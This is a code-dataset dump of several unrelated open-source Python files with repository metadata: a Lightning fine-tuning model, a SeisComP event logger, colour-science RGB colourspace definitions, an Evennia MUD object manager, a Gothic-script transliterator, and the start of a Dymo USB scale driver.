hexsha
stringlengths 40
40
| size
int64 1
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
239
| max_stars_repo_name
stringlengths 5
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
239
| max_issues_repo_name
stringlengths 5
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
239
| max_forks_repo_name
stringlengths 5
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 1
1.03M
| avg_line_length
float64 1
958k
| max_line_length
int64 1
1.03M
| alphanum_fraction
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4a0a06091ec209d847b7de3bee0f523f4913b47a
| 902
|
py
|
Python
|
extinct/components/models/finetuning.py
|
olliethomas/extinct-dino
|
7d47d8f7763d9791fa8d5027898b27fcee0901c4
|
[
"Apache-2.0"
] | null | null | null |
extinct/components/models/finetuning.py
|
olliethomas/extinct-dino
|
7d47d8f7763d9791fa8d5027898b27fcee0901c4
|
[
"Apache-2.0"
] | 1
|
2021-10-13T14:21:10.000Z
|
2021-10-13T14:21:10.000Z
|
extinct/components/models/finetuning.py
|
olliethomas/extinct-dino
|
7d47d8f7763d9791fa8d5027898b27fcee0901c4
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import annotations
from kit import implements
import pytorch_lightning as pl
import torch
from torch import Tensor, nn, optim
from extinct.components.models import ErmBaseline
__all__ = ["FineTuner"]
class FineTuner(ErmBaseline):
    """ERM baseline variant that fine-tunes only the classification head.

    The encoder ``self.enc`` is treated as a frozen feature extractor:
    no gradients are taken through it and its parameters are excluded
    from the optimizer. Hyper-parameters (``learning_rate``,
    ``weight_decay``, ``lr_gamma``) come from ``ErmBaseline``.
    """

    def reset_parameters(self) -> None:
        """Re-initialise the classifier head only; the encoder is untouched."""
        self.clf.apply(self._maybe_reset_parameters)

    @implements(nn.Module)
    def forward(self, x: Tensor) -> Tensor:
        """Encode ``x`` without tracking gradients, then classify the features."""
        with torch.no_grad():
            features = self.enc(x)
        return self.clf(features)

    @implements(pl.LightningModule)
    def configure_optimizers(
        self,
    ) -> tuple[list[optim.Optimizer], list[optim.lr_scheduler.ExponentialLR]]:
        """Build an AdamW optimizer over the classifier head with exponential LR decay."""
        optimizer = optim.AdamW(
            self.clf.parameters(),
            lr=self.learning_rate,
            weight_decay=self.weight_decay,
        )
        scheduler = optim.lr_scheduler.ExponentialLR(
            optimizer=optimizer, gamma=self.lr_gamma
        )
        return [optimizer], [scheduler]
| 28.1875
| 88
| 0.68847
|
4a0a066c16365450e30da1ac665c80d182e02347
| 2,130
|
py
|
Python
|
src/trunk/apps/python/sceplog.py
|
thefroid/seiscomp3
|
0b05d5550dcea000a93c7d9a39c5347d8786a91a
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | 2
|
2015-09-17T22:43:50.000Z
|
2017-11-29T20:27:11.000Z
|
src/trunk/apps/python/sceplog.py
|
thefroid/seiscomp3
|
0b05d5550dcea000a93c7d9a39c5347d8786a91a
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | 2
|
2016-04-26T00:03:09.000Z
|
2017-12-05T02:24:50.000Z
|
src/trunk/apps/python/sceplog.py
|
salichon/seiscomp3
|
4f7715f9ff9a35e7912c379ebf10446d0bceaeb2
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
#!/usr/bin/env python
############################################################################
# Copyright (C) by GFZ Potsdam #
# #
# You can redistribute and/or modify this program under the #
# terms of the SeisComP Public License. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# SeisComP Public License for more details. #
############################################################################
import sys, os
import seiscomp3.Client
class EventParameterLog(seiscomp3.Client.Application):
    """Collect event-parameter messages and dump them as XML on exit.

    Subscribes to the EVENT/LOCATION/MAGNITUDE/AMPLITUDE/PICK messaging
    groups with auto-applied notifiers, so ``self._eventParameters``
    accumulates state while the message loop runs; on shutdown the
    accumulated objects are written as formatted XML to stdout.
    """

    def __init__(self, argc, argv):
        seiscomp3.Client.Application.__init__(self, argc, argv)
        self.setMessagingEnabled(True)
        # No database access needed; we only listen to messages.
        self.setDatabaseEnabled(False, False)
        # Empty username: let the messaging system assign one.
        self.setMessagingUsername("")
        self.setPrimaryMessagingGroup(seiscomp3.Communication.Protocol.LISTENER_GROUP)
        self.addMessagingSubscription("EVENT")
        self.addMessagingSubscription("LOCATION")
        self.addMessagingSubscription("MAGNITUDE")
        self.addMessagingSubscription("AMPLITUDE")
        self.addMessagingSubscription("PICK")
        # Incoming notifiers are applied automatically to local objects.
        self.setAutoApplyNotifierEnabled(True)
        self.setInterpretNotifierEnabled(True)
        # EventParameters object populated from incoming notifier messages.
        self._eventParameters = seiscomp3.DataModel.EventParameters()

    def run(self):
        """Run the message loop, then write the collected objects as XML to stdout.

        Returns False if the base application's run() fails, True otherwise.
        """
        # Idiom fix: was `== False` / `== True` comparisons.
        if not seiscomp3.Client.Application.run(self):
            return False
        ar = seiscomp3.IO.XMLArchive()
        ar.setFormattedOutput(True)
        if ar.create("-"):  # "-" selects stdout as the output target
            ar.writeObject(self._eventParameters)
            ar.close()
            # Hack to avoid the "close failed in file object destructor"
            # exception
            sys.stdout.write("\n")
        return True
# Guard the entry point so importing this module does not start the
# application (previously it ran unconditionally on import).
if __name__ == "__main__":
    app = EventParameterLog(len(sys.argv), sys.argv)
    sys.exit(app())
| 36.101695
| 82
| 0.573709
|
4a0a0720e2b976b638cc596d0d8b9cc0897c0113
| 4,849
|
py
|
Python
|
colour/models/dataset/__init__.py
|
canavandl/colour
|
a453cd37b6135a9092d5ea5b2aafb8d19134bdff
|
[
"BSD-3-Clause"
] | 1
|
2019-06-27T11:32:48.000Z
|
2019-06-27T11:32:48.000Z
|
colour/models/dataset/__init__.py
|
canavandl/colour
|
a453cd37b6135a9092d5ea5b2aafb8d19134bdff
|
[
"BSD-3-Clause"
] | null | null | null |
colour/models/dataset/__init__.py
|
canavandl/colour
|
a453cd37b6135a9092d5ea5b2aafb8d19134bdff
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from .aces_rgb_idt import ACES_RICD
from .aces_rgb import ACES_RGB_COLOURSPACE, ACES_RGB_LOG_COLOURSPACE
from .aces_rgb import (
ACES_RGB_PROXY_10_COLOURSPACE,
ACES_RGB_PROXY_12_COLOURSPACE)
from .adobe_rgb_1998 import ADOBE_RGB_1998_COLOURSPACE
from .adobe_wide_gamut_rgb import ADOBE_WIDE_GAMUT_RGB_COLOURSPACE
from .alexa_wide_gamut_rgb import ALEXA_WIDE_GAMUT_RGB_COLOURSPACE
from .apple_rgb import APPLE_RGB_COLOURSPACE
from .best_rgb import BEST_RGB_COLOURSPACE
from .beta_rgb import BETA_RGB_COLOURSPACE
from .c_log import C_LOG_COLOURSPACE
from .cie_rgb import CIE_RGB_COLOURSPACE
from .color_match_rgb import COLOR_MATCH_RGB_COLOURSPACE
from .dci_p3 import DCI_P3_COLOURSPACE
from .don_rgb_4 import DON_RGB_4_COLOURSPACE
from .eci_rgb_v2 import ECI_RGB_V2_COLOURSPACE
from .ekta_space_ps5 import EKTA_SPACE_PS_5_COLOURSPACE
from .max_rgb import MAX_RGB_COLOURSPACE
from .ntsc_rgb import NTSC_RGB_COLOURSPACE
from .pal_secam_rgb import PAL_SECAM_RGB_COLOURSPACE
from .prophoto_rgb import PROPHOTO_RGB_COLOURSPACE
from .rec_709 import REC_709_COLOURSPACE
from .rec_2020 import REC_2020_COLOURSPACE
from .russell_rgb import RUSSELL_RGB_COLOURSPACE
from .s_log import S_LOG_COLOURSPACE
from .smptec_rgb import SMPTE_C_RGB_COLOURSPACE
from .srgb import sRGB_COLOURSPACE
from .xtreme_rgb import XTREME_RGB_COLOURSPACE
from .pointer_gamut import POINTER_GAMUT_DATA
from colour.utilities import CaseInsensitiveMapping
# All imported colourspace definitions, keyed below by their `.name`.
_COLOURSPACES = (
    ACES_RGB_COLOURSPACE,
    ACES_RGB_LOG_COLOURSPACE,
    ACES_RGB_PROXY_10_COLOURSPACE,
    ACES_RGB_PROXY_12_COLOURSPACE,
    ADOBE_RGB_1998_COLOURSPACE,
    ADOBE_WIDE_GAMUT_RGB_COLOURSPACE,
    ALEXA_WIDE_GAMUT_RGB_COLOURSPACE,
    APPLE_RGB_COLOURSPACE,
    BEST_RGB_COLOURSPACE,
    BETA_RGB_COLOURSPACE,
    CIE_RGB_COLOURSPACE,
    C_LOG_COLOURSPACE,
    COLOR_MATCH_RGB_COLOURSPACE,
    DCI_P3_COLOURSPACE,
    DON_RGB_4_COLOURSPACE,
    ECI_RGB_V2_COLOURSPACE,
    EKTA_SPACE_PS_5_COLOURSPACE,
    MAX_RGB_COLOURSPACE,
    NTSC_RGB_COLOURSPACE,
    PAL_SECAM_RGB_COLOURSPACE,
    PROPHOTO_RGB_COLOURSPACE,
    REC_709_COLOURSPACE,
    REC_2020_COLOURSPACE,
    RUSSELL_RGB_COLOURSPACE,
    S_LOG_COLOURSPACE,
    SMPTE_C_RGB_COLOURSPACE,
    sRGB_COLOURSPACE,
    XTREME_RGB_COLOURSPACE)

RGB_COLOURSPACES = CaseInsensitiveMapping(
    dict((colourspace.name, colourspace) for colourspace in _COLOURSPACES))
"""
Aggregated *RGB* colourspaces.
RGB_COLOURSPACES : dict
Aliases:
- 'aces': ACES_RGB_COLOURSPACE.name
- 'adobe1998': ADOBE_RGB_1998_COLOURSPACE.name
- 'prophoto': PROPHOTO_RGB_COLOURSPACE.name
"""

# Convenience short aliases into the aggregated mapping.
RGB_COLOURSPACES['aces'] = RGB_COLOURSPACES[ACES_RGB_COLOURSPACE.name]
RGB_COLOURSPACES['adobe1998'] = RGB_COLOURSPACES[ADOBE_RGB_1998_COLOURSPACE.name]
RGB_COLOURSPACES['prophoto'] = RGB_COLOURSPACES[PROPHOTO_RGB_COLOURSPACE.name]

__all__ = ['ACES_RICD',
           'RGB_COLOURSPACES',
           'ACES_RGB_COLOURSPACE',
           'ACES_RGB_LOG_COLOURSPACE',
           'ACES_RGB_PROXY_10_COLOURSPACE',
           'ACES_RGB_PROXY_12_COLOURSPACE',
           'ADOBE_RGB_1998_COLOURSPACE',
           'ADOBE_WIDE_GAMUT_RGB_COLOURSPACE',
           'ALEXA_WIDE_GAMUT_RGB_COLOURSPACE',
           'APPLE_RGB_COLOURSPACE',
           'BEST_RGB_COLOURSPACE',
           'BETA_RGB_COLOURSPACE',
           'CIE_RGB_COLOURSPACE',
           'C_LOG_COLOURSPACE',
           'COLOR_MATCH_RGB_COLOURSPACE',
           'DCI_P3_COLOURSPACE',
           'DON_RGB_4_COLOURSPACE',
           'ECI_RGB_V2_COLOURSPACE',
           'EKTA_SPACE_PS_5_COLOURSPACE',
           'MAX_RGB_COLOURSPACE',
           'NTSC_RGB_COLOURSPACE',
           'PAL_SECAM_RGB_COLOURSPACE',
           'PROPHOTO_RGB_COLOURSPACE',
           'REC_709_COLOURSPACE',
           'REC_2020_COLOURSPACE',
           'RUSSELL_RGB_COLOURSPACE',
           'S_LOG_COLOURSPACE',
           'SMPTE_C_RGB_COLOURSPACE',
           'sRGB_COLOURSPACE',
           'XTREME_RGB_COLOURSPACE',
           'POINTER_GAMUT_DATA']
| 41.09322
| 77
| 0.783254
|
4a0a0aad4162d9d8c545be609b98fdaf6362f15b
| 18,994
|
py
|
Python
|
src/objects/manager.py
|
reddcoin-project/ReddConnect
|
5c212683de6b80b81fd15ed05239c3a1b46c3afd
|
[
"BSD-3-Clause"
] | 2
|
2019-02-24T00:20:47.000Z
|
2020-04-24T15:50:31.000Z
|
src/objects/manager.py
|
reddcoin-project/ReddConnect
|
5c212683de6b80b81fd15ed05239c3a1b46c3afd
|
[
"BSD-3-Clause"
] | null | null | null |
src/objects/manager.py
|
reddcoin-project/ReddConnect
|
5c212683de6b80b81fd15ed05239c3a1b46c3afd
|
[
"BSD-3-Clause"
] | 1
|
2019-01-05T15:51:37.000Z
|
2019-01-05T15:51:37.000Z
|
"""
Custom manager for Objects.
"""
from itertools import chain
from django.db.models import Q
from django.conf import settings
from django.db.models.fields import exceptions
from src.typeclasses.managers import TypedObjectManager
from src.typeclasses.managers import returns_typeclass, returns_typeclass_list
from src.utils import utils
from src.utils.utils import to_unicode, is_iter, make_iter, string_partial_matching
__all__ = ("ObjectManager",)
_GA = object.__getattribute__
# delayed import
_ATTR = None
# Try to use a custom way to parse id-tagged multimatches.
_AT_MULTIMATCH_INPUT = utils.variable_from_module(*settings.SEARCH_AT_MULTIMATCH_INPUT.rsplit('.', 1))
class ObjectManager(TypedObjectManager):
    """
    This ObjectManager implements methods for searching
    and manipulating Objects directly from the database.
    Evennia-specific search methods (will return Typeclasses or
    lists of Typeclasses, whereas Django-general methods will return
    Querysets or database objects).
    dbref (converter)
    get_id (alias: dbref_search)
    get_dbref_range
    object_totals
    typeclass_search
    get_object_with_player
    get_objs_with_key_and_typeclass
    get_objs_with_attr
    get_objs_with_attr_match
    get_objs_with_db_property
    get_objs_with_db_property_match
    get_objs_with_key_or_alias
    get_contents
    object_search (interface to many of the above methods,
    equivalent to ev.search_object)
    copy_object
    """
    #
    # ObjectManager Get methods
    #
    # player related
    @returns_typeclass
    def get_object_with_player(self, ostring, exact=True, candidates=None):
        """
        Search for an object based on its player's name or dbref.
        This search
        is sometimes initiated by appending a * to the beginning of
        the search criterion (e.g. in local_and_global_search).
        search_string: (string) The name or dbref to search for.
        """
        ostring = to_unicode(ostring).lstrip('*')
        # simplest case - search by dbref
        dbref = self.dbref(ostring)
        if dbref:
            return dbref
        # not a dbref. Search by name.
        # Py2-era `cond and X or Y` idiom: Q() is a no-op filter when
        # no candidate restriction is given.
        cand_restriction = candidates != None and Q(pk__in=[_GA(obj, "id") for obj in make_iter(candidates) if obj]) or Q()
        if exact:
            return self.filter(cand_restriction & Q(db_player__username__iexact=ostring))
        else: # fuzzy matching
            # NOTE(review): exact branch filters on db_player__username but
            # this branch uses playerdb__username - confirm both resolve to
            # the same relation.
            ply_cands = self.filter(cand_restriction & Q(playerdb__username__istartswith=ostring)).values_list("db_key", flat=True)
            if candidates:
                index_matches = string_partial_matching(ply_cands, ostring, ret_index=True)
                return [obj for ind, obj in enumerate(make_iter(candidates)) if ind in index_matches]
            else:
                return string_partial_matching(ply_cands, ostring, ret_index=False)

    @returns_typeclass_list
    def get_objs_with_key_and_typeclass(self, oname, otypeclass_path, candidates=None):
        """
        Returns objects based on simultaneous key and typeclass match.
        """
        cand_restriction = candidates != None and Q(pk__in=[_GA(obj, "id") for obj in make_iter(candidates) if obj]) or Q()
        return self.filter(cand_restriction & Q(db_key__iexact=oname, db_typeclass_path__exact=otypeclass_path))

    # attr/property related
    @returns_typeclass_list
    def get_objs_with_attr(self, attribute_name, candidates=None):
        """
        Returns all objects having the given attribute_name defined at all.
        Location should be a valid location object.
        """
        cand_restriction = candidates != None and Q(db_attributes__db_obj__pk__in=[_GA(obj, "id") for obj in make_iter(candidates) if obj]) or Q()
        return list(self.filter(cand_restriction & Q(db_attributes__db_key=attribute_name)))

    @returns_typeclass_list
    def get_objs_with_attr_value(self, attribute_name, attribute_value, candidates=None, typeclasses=None):
        """
        Returns all objects having the valid attrname set to the given value.
        candidates - list of candidate objects to search
        typeclasses - list of typeclass-path strings to restrict matches with
        This uses the Attribute's PickledField to transparently search the database by matching
        the internal representation. This is reasonably effective but since Attribute values
        cannot be indexed, searching by Attribute key is to be preferred whenever possible.
        """
        cand_restriction = candidates != None and Q(pk__in=[_GA(obj, "id") for obj in make_iter(candidates) if obj]) or Q()
        type_restriction = typeclasses and Q(db_typeclass_path__in=make_iter(typeclasses)) or Q()
        ## This doesn't work if attribute_value is an object. Workaround below
        # Primitive values can be matched directly against the pickled field.
        if isinstance(attribute_value, (basestring, int, float, bool, long)):
            return self.filter(cand_restriction & type_restriction & Q(db_attributes__db_key=attribute_name, db_attributes__db_value=attribute_value))
        else:
            # We have to loop for safety since the referenced lookup gives deepcopy error if attribute value is an object.
            # Lazily import Attribute to avoid a circular import at module load.
            global _ATTR
            if not _ATTR:
                from src.typeclasses.models import Attribute as _ATTR
            cands = list(self.filter(cand_restriction & type_restriction & Q(db_attributes__db_key=attribute_name)))
            results = [attr.objectdb_set.all() for attr in _ATTR.objects.filter(objectdb__in=cands, db_value=attribute_value)]
            return chain(*results)

    @returns_typeclass_list
    def get_objs_with_db_property(self, property_name, candidates=None):
        """
        Returns all objects having a given db field property.
        property_name = search string
        candidates - list of candidate objects to search
        """
        # Normalise to the db_-prefixed field name used by the model.
        property_name = "db_%s" % property_name.lstrip('db_')
        cand_restriction = candidates != None and Q(pk__in=[_GA(obj, "id") for obj in make_iter(candidates) if obj]) or Q()
        querykwargs = {property_name:None}
        try:
            # Exclude rows where the field is NULL, i.e. keep objects that
            # actually have the property set.
            return list(self.filter(cand_restriction).exclude(Q(**querykwargs)))
        except exceptions.FieldError:
            # property_name is not a real model field.
            return []

    @returns_typeclass_list
    def get_objs_with_db_property_value(self, property_name, property_value, candidates=None, typeclasses=None):
        """
        Returns all objects having a given db field property.
        candidates - list of objects to search
        typeclasses - list of typeclass-path strings to restrict matches with
        """
        if isinstance(property_value, basestring):
            property_value = to_unicode(property_value)
        if isinstance(property_name, basestring):
            if not property_name.startswith('db_'):
                property_name = "db_%s" % property_name
        # Typeclassed values wrap a database object; compare against that.
        if hasattr(property_value, 'dbobj'):
            property_value = property_value.dbobj
        querykwargs = {property_name:property_value}
        cand_restriction = candidates != None and Q(pk__in=[_GA(obj, "id") for obj in make_iter(candidates) if obj]) or Q()
        type_restriction = typeclasses and Q(db_typeclass_path__in=make_iter(typeclasses)) or Q()
        try:
            return list(self.filter(cand_restriction & type_restriction & Q(**querykwargs)))
        except exceptions.FieldError:
            return []
        except ValueError:
            from src.utils import logger
            logger.log_errmsg("The property '%s' does not support search criteria of the type %s." % (property_name, type(property_value)))
            return []

    @returns_typeclass_list
    def get_contents(self, location, excludeobj=None):
        """
        Get all objects that has a location
        set to this one.
        excludeobj - one or more object keys to exclude from the match
        """
        exclude_restriction = Q(pk__in=[_GA(obj, "id") for obj in make_iter(excludeobj)]) if excludeobj else Q()
        return self.filter(db_location=location).exclude(exclude_restriction)

    @returns_typeclass_list
    def get_objs_with_key_or_alias(self, ostring, exact=True,
                                   candidates=None, typeclasses=None):
        """
        Returns objects based on key or alias match. Will also do fuzzy
        matching based on the utils.string_partial_matching function.
        candidates - list of candidate objects to restrict on
        typeclasses - list of typeclass path strings to restrict on
        """
        if not isinstance(ostring, basestring):
            # Allow passing an object; fall back to its key if available.
            if hasattr(ostring, "key"):
                ostring = ostring.key
            else:
                return []
        if is_iter(candidates) and not len(candidates):
            # if candidates is an empty iterable there can be no matches
            # Exit early.
            return []
        # build query objects
        candidates_id = [_GA(obj, "id") for obj in make_iter(candidates) if obj]
        cand_restriction = candidates != None and Q(pk__in=make_iter(candidates_id)) or Q()
        type_restriction = typeclasses and Q(db_typeclass_path__in=make_iter(typeclasses)) or Q()
        if exact:
            # exact match - do direct search
            return self.filter(cand_restriction & type_restriction & (Q(db_key__iexact=ostring) |
                               Q(db_tags__db_key__iexact=ostring) & Q(db_tags__db_tagtype__iexact="alias"))).distinct()
        elif candidates:
            # fuzzy with candidates
            key_candidates = self.filter(cand_restriction & type_restriction)
        else:
            # fuzzy without supplied candidates - we select our own candidates
            key_candidates = self.filter(type_restriction & (Q(db_key__istartswith=ostring) | Q(db_tags__db_key__istartswith=ostring))).distinct()
            candidates_id = [_GA(obj, "id") for obj in key_candidates]
        # fuzzy matching
        key_strings = key_candidates.values_list("db_key", flat=True)
        index_matches = string_partial_matching(key_strings, ostring, ret_index=True)
        if index_matches:
            return [obj for ind, obj in enumerate(key_candidates) if ind in index_matches]
        else:
            # No key matches; fall back to matching against aliases.
            alias_candidates = self.filter(id__in=candidates_id, db_tags__db_tagtype__iexact="alias")
            alias_strings = alias_candidates.values_list("db_key", flat=True)
            index_matches = string_partial_matching(alias_strings, ostring, ret_index=True)
            if index_matches:
                return [alias.db_obj for ind, alias in enumerate(alias_candidates) if ind in index_matches]
            return []

    # main search methods and helper functions
    @returns_typeclass_list
    def object_search(self, searchdata,
                      attribute_name=None,
                      typeclass=None,
                      candidates=None,
                      exact=True):
        """
        Search as an object globally or in a list of candidates and return
        results. The result is always an Object. Always returns a list.
        Arguments:
        searchdata: (str or obj) The entity to match for. This is usually a
        key string but may also be an object itself. By default (if
        not attribute_name is set), this will search object.key and
        object.aliases in order. Can also be on the form #dbref,
        which will, if exact=True be matched against primary key.
        attribute_name: (str): Use this named ObjectAttribute to match
        searchdata against, instead of the defaults. If this is
        the name of a database field (with or without the db_ prefix),
        that will be matched too.
        typeclass (str or TypeClass): restrict matches to objects having this
        typeclass. This will help speed up global searches.
        candidates (list obj ObjectDBs): If supplied, search will only be
        performed among the candidates in this list. A common list
        of candidates is the contents of the current location
        searched.
        exact (bool): Match names/aliases exactly or partially. Partial
        matching matches the beginning of words in the names/aliases,
        using a matching routine to separate multiple matches in
        names with multiple components (so "bi sw" will match
        "Big sword"). Since this is more expensive than exact
        matching, it is recommended to be used together with the
        objlist keyword to limit the number of possibilities. This
        value has no meaning if searching for attributes/properties.
        Returns:
        A list of matching objects (or a list with one unique match)
        """
        def _searcher(searchdata, candidates, typeclass, exact=False):
            """
            Helper method for searching objects. typeclass is only used
            for global searching (no candidates)
            """
            if attribute_name:
                # attribute/property search (always exact).
                matches = self.get_objs_with_db_property_value(attribute_name, searchdata, candidates=candidates, typeclasses=typeclass)
                if matches:
                    return matches
                return self.get_objs_with_attr_value(attribute_name, searchdata, candidates=candidates, typeclasses=typeclass)
            else:
                # normal key/alias search
                return self.get_objs_with_key_or_alias(searchdata, exact=exact, candidates=candidates, typeclasses=typeclass)
        # Empty search string: no result (0 is a valid dbref-like value).
        if not searchdata and searchdata != 0:
            return []
        if typeclass:
            # typeclass may also be a list
            # Normalise each entry to a typeclass-path string.
            typeclasses = make_iter(typeclass)
            for i, typeclass in enumerate(make_iter(typeclasses)):
                if callable(typeclass):
                    typeclasses[i] = u"%s.%s" % (typeclass.__module__, typeclass.__name__)
                else:
                    typeclasses[i] = u"%s" % typeclass
            typeclass = typeclasses
        if candidates:
            # Convenience check to make sure candidates are really dbobjs
            candidates = [cand.dbobj for cand in make_iter(candidates) if cand]
            if typeclass:
                candidates = [cand for cand in candidates
                              if _GA(cand, "db_typeclass_path") in typeclass]
        dbref = not attribute_name and exact and self.dbref(searchdata)
        if dbref is not None:
            # Easiest case - dbref matching (always exact)
            # NOTE(review): dbref may be False (not None) when
            # attribute_name is set or exact is False - confirm
            # self.dbref_search handles a falsy argument gracefully.
            dbref_match = self.dbref_search(dbref)
            if dbref_match:
                if not candidates or dbref_match.dbobj in candidates:
                    return [dbref_match]
                else:
                    return []
        # Search through all possibilities.
        match_number = None
        # always run first check exact - we don't want partial matches
        # if on the form of 1-keyword etc.
        matches = _searcher(searchdata, candidates, typeclass, exact=True)
        if not matches:
            # no matches found - check if we are dealing with N-keyword
            # query - if so, strip it.
            match_number, searchdata = _AT_MULTIMATCH_INPUT(searchdata)
            # run search again, with the exactness set by call
            if match_number is not None or not exact:
                matches = _searcher(searchdata, candidates, typeclass, exact=exact)
        # deal with result
        if len(matches) > 1 and match_number is not None:
            # multiple matches, but a number was given to separate them
            try:
                matches = [matches[match_number]]
            except IndexError:
                pass
        # return a list (possibly empty)
        return matches

    #
    # ObjectManager Copy method
    #
    def copy_object(self, original_object, new_key=None,
                    new_location=None, new_home=None,
                    new_permissions=None, new_locks=None,
                    new_aliases=None, new_destination=None):
        """
        Create and return a new object as a copy of the original object. All
        will be identical to the original except for the arguments given
        specifically to this method.
        original_object (obj) - the object to make a copy from
        new_key (str) - name the copy differently from the original.
        new_location (obj) - if not None, change the location
        new_home (obj) - if not None, change the Home
        new_aliases (list of strings) - if not None, change object aliases.
        new_destination (obj) - if not None, change destination
        """
        # get all the object's stats
        typeclass_path = original_object.typeclass_path
        # Fall back to the original's values for any unspecified argument.
        if not new_key:
            new_key = original_object.key
        if not new_location:
            new_location = original_object.location
        if not new_home:
            new_home = original_object.home
        if not new_aliases:
            new_aliases = original_object.aliases.all()
        if not new_locks:
            new_locks = original_object.db_lock_storage
        if not new_permissions:
            new_permissions = original_object.permissions.all()
        if not new_destination:
            new_destination = original_object.destination
        # create new object
        from src.utils import create
        from src.scripts.models import ScriptDB
        new_object = create.create_object(typeclass_path,
                                          key=new_key,
                                          location=new_location,
                                          home=new_home,
                                          permissions=new_permissions,
                                          locks=new_locks,
                                          aliases=new_aliases,
                                          destination=new_destination)
        if not new_object:
            return None
        # copy over all attributes from old to new.
        for attr in original_object.attributes.all():
            new_object.attributes.add(attr.key, attr.value)
        # copy over all cmdsets, if any
        for icmdset, cmdset in enumerate(original_object.cmdset.all()):
            if icmdset == 0:
                new_object.cmdset.add_default(cmdset)
            else:
                new_object.cmdset.add(cmdset)
        # copy over all scripts, if any
        for script in original_object.scripts.all():
            ScriptDB.objects.copy_script(script, new_obj=new_object.dbobj)
        return new_object

    def clear_all_sessids(self):
        """
        Clear the db_sessid field of all objects having also the db_player field
        set.
        """
        self.filter(db_sessid__isnull=False).update(db_sessid=None)
| 45.768675
| 150
| 0.642571
|
4a0a0b47bc5f2efc43e089e34302691f85d1ead8
| 2,031
|
py
|
Python
|
pieoffice/gothic.py
|
caiogeraldes/pieoffice
|
472a98081bdf83d776ac8b05d377bf7fec2fe96b
|
[
"MIT"
] | null | null | null |
pieoffice/gothic.py
|
caiogeraldes/pieoffice
|
472a98081bdf83d776ac8b05d377bf7fec2fe96b
|
[
"MIT"
] | null | null | null |
pieoffice/gothic.py
|
caiogeraldes/pieoffice
|
472a98081bdf83d776ac8b05d377bf7fec2fe96b
|
[
"MIT"
] | null | null | null |
#! /usr/bin/env python3
""" Gothic converter
The transliteration scheme is as follows
-----------------------------------------------------------------------
| a 𐌰 | b 𐌱 | g 𐌲 | d 𐌳 | e 𐌴 | q 𐌵 | z 𐌶 |
| h 𐌷 | th 𐌸 | i 𐌹 | k 𐌺 | l 𐌻 | m 𐌼 | n 𐌽 |
| j 𐌾 | u 𐌿 | p 𐍀 | q' 𐍁 | r 𐍂 | s 𐍃 | t 𐍄 |
| w 𐍅 | f 𐍆 | x 𐍇 | hw 𐍈 | o 𐍉 | z' 𐍊 | |
-----------------------------------------------------------------------
"""
def alpha_to_gothic(input):
    """Transliterate Latin-alphabet text to the Gothic script.

    Parameters
    ----------
    input : str
        Text input with syllables separated by dashes and words by spaces.

    Returns
    -------
    output : str
        Transliterated text in Gothic Script
    """
    # Multi-character sequences must be handled before the single-letter
    # mapping so that e.g. "th" becomes 𐌸 rather than 𐍄𐌷 and "hw"
    # becomes 𐍈 rather than 𐌷𐍅.
    digraphs = (("th", "𐌸"), ("q'", "𐍁"), ("z'", "𐍊"), ("hw", "𐍈"))
    # Remaining letters map one-to-one; str.translate does them all in a
    # single pass instead of 23 chained .replace() calls.
    singles = str.maketrans({
        "a": "𐌰", "b": "𐌱", "g": "𐌲", "d": "𐌳", "e": "𐌴", "q": "𐌵",
        "z": "𐌶", "h": "𐌷", "i": "𐌹", "k": "𐌺", "l": "𐌻", "m": "𐌼",
        "n": "𐌽", "j": "𐌾", "u": "𐌿", "p": "𐍀", "r": "𐍂", "s": "𐍃",
        "t": "𐍄", "w": "𐍅", "f": "𐍆", "x": "𐍇", "o": "𐍉",
    })
    output = input
    for sequence, glyph in digraphs:
        output = output.replace(sequence, glyph)
    return output.translate(singles)
if __name__ == "__main__":
    # Quick manual smoke test: transliterate a sample word.
    sample_text = """
    wulfila
    """
    print(alpha_to_gothic(sample_text))
| 29.434783
| 75
| 0.458887
|
4a0a0b8871e54a62cce1a61910b02aecdff62120
| 3,515
|
py
|
Python
|
dymouse/driver/USBScale.py
|
x4rMa/dymouse
|
0304837f4af362ec33ec6da09c7eb6a9840dcca6
|
[
"MIT"
] | 2
|
2020-11-02T17:52:01.000Z
|
2021-02-25T14:34:24.000Z
|
dymouse/driver/USBScale.py
|
x4rMa/dymouse
|
0304837f4af362ec33ec6da09c7eb6a9840dcca6
|
[
"MIT"
] | null | null | null |
dymouse/driver/USBScale.py
|
x4rMa/dymouse
|
0304837f4af362ec33ec6da09c7eb6a9840dcca6
|
[
"MIT"
] | null | null | null |
from datetime import datetime
import time
import usb.core
import usb.util
class USBScaleSingleton(object):
    """
    Singleton class for the DymoUSBScale
    (Useful to avoid repeatedly creating/destroying
    instances of the scale)
    """
    def __new__(cls, **kwargs):
        # The first positional argument of __new__ is the class, so name
        # it `cls` (it was misleadingly called `self`). The shared
        # instance is cached as a class attribute.
        try:
            return cls.scale
        except AttributeError:
            # First call: create and cache the single scale instance.
            cls.scale = DymoUSBScale(**kwargs)
            return cls.scale
